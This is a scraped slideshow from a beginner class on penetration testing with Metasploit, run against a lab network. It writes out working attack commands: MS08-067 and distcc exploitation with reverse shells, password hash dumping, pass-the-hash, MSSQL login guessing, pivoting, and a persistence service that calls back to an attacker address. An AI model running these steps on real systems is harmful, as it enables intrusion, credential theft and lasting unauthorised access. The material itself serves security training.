Successfully reported this slideshow.

Metasploit for Penetration Testing: Beginner Class

41

Share

Upcoming SlideShare
Metasploit For Beginners
Metasploit For Beginners
Loading in …3
×
1 of 43
1 of 43

More Related Content

Related Books

Free with a 14 day trial from Scribd

See all

Metasploit for Penetration Testing: Beginner Class

  1. 1. Penetration Testing with Metasploit Georgia Weidman
  2. 2. Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
  3. 3. Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
  4. 4. Agenda • Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
  5. 5. Connecting Wireless access point SSID IgnatiusRiley Password: metasploit
  6. 6. What’s in the lab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
  7. 7. What is Penetration Testing? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
  8. 8. What is Metasploit? Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
  9. 9. Metasploit Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
  10. 10. Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
  11. 11. Exploitation Streamlining • Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
  12. 12. Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  13. 13. Windows Exploitation Example search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
  14. 14. MSFcli Exploitation Example ./msfcli <exploit> <option=x> E Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
  15. 15. Linux Exploitation Example search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (your ip) exploit
  16. 16. Sessions sessions -l lists all active sessions Sessions –i <id> interact with a given session
  17. 17. Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
  18. 18. Meterpreter Commands help – shows all available commands background – backgrounds the session ps – shows all processes migrate <process id>– moves meterpreter to another process getuid – shows the user
  19. 19. Meterpreter Commands download <file> - pulls a file from the victim upload <file on attacker> <file on victim> - pushes a file to the victim hashdump – dumps the hashes from the sam shell – drops you in a shell
  20. 20. Exercise In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
  21. 21. Information Gathering Learning as much about a target as possible Examples: open ports, running services, installed software Identify points for further exploration
  22. 22. Metasploit and Databases Metasploit supports MySQL and PostgreSQL /etc/init.d/postgresql-8.4 start (starts PostgeSQL) msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
  23. 23. Portscanning Queries a host to see if a program is listening Ex: Browsing to a website – webserver listens on port 80 Listening ports are accessible by an attacker and if vulnerable may be used for exploitation Ex: ms08_067_netapi exploits smb on port 445
  24. 24. Metasploit and nmap Port scanning and just about everything else http://nmap.org/ man nmap Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1) msf > db_import subnet1.xml
  25. 25. MSF Axillary Portscanners msf > search portscan (shows portscan modules) scanner/portscan/tcp (runs a TCP syn scan) Use auxiliary modules like exploits (use, set, exploit, etc.)
  26. 26. Some Other MSF Scanners scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version) scanner/ssh/ssh_version (queries the ssh version) scanner/ftp/anonymous (anonymous ftp login)
  27. 27. Vulnerability Scanning Query systems for potential vulnerabilities Identify potential methods of penetration Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  28. 28. Metasploit and Nessus Tenable's Vulnerability Scanner (http://www.nessus.org) msf>load nessus msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok) msf > nessus_policy_list msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage) msf> nessus_report_list msf> nessus_report_get <report id>
  29. 29. Metasploit Vulnerability Scanners SMB Login Given a set of credentials what systems can they access? scanner/smb/smb_login Open VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
  30. 30. Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  31. 31. Our Database hosts services vulns -c select columns -s search for specific string
  32. 32. db_autopwn By default just runs all the exploits that match a given open port Not stealthy Using vulnerability data can be made smarter, matches vulnerabilities instead of ports db_autopwn -x -e
  33. 33. Attacking MSSQL MSSQL TCP port can change, UDP port is 1434 msf> search mssql (shows all mssql modules) msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port) msf> use scanner/mssql/mssql_login (tries passwords to log into mssql) msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
  34. 34. We have a shell, now what? Privilege escalation Local information gathering Exploiting additional hosts Maintaining access Forensic avoidance
  35. 35. Meterpreter: Privilege Escalation A session has the privileges of the exploited process getuid (tells you what user your session is running as) getsystem (tries various techniques to escalate privileges)
  36. 36. Meterpreter: Enabling Remote Desktop Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group run getgui –e
  37. 37. Meterpreter: Migrating If the process that hosts meterpreter closes meterpreter dies too Example: client side exploit residing in the browser meterpreter> ps (shows all processes) meterpreter> migrate <process id> (moves to a new process)
  38. 38. Meterpreter: Searching for Content Look for specific interesting files on the exploited system search -h Example: search -f *.jpg (finds all the porn)
  39. 39. Pivoting Scenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling? Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1) Now you can portscan, exploit, etc. the non routable subnet
  40. 40. PSExec hashdump (dumps the hashes, not always easy to crack) Why not just pass the hash to other systems? use windows/smb/psexec set SMBPass to the hash
  41. 41. Meterpreter: Persistence Persistence script installs a meterpreter service Meterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
  42. 42. Exercises Perform a penetration test on the Windows and Linux systems we used in class Perform a penetration test on the lab network
  43. 43. Contact Georgia Weidman Website: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon

×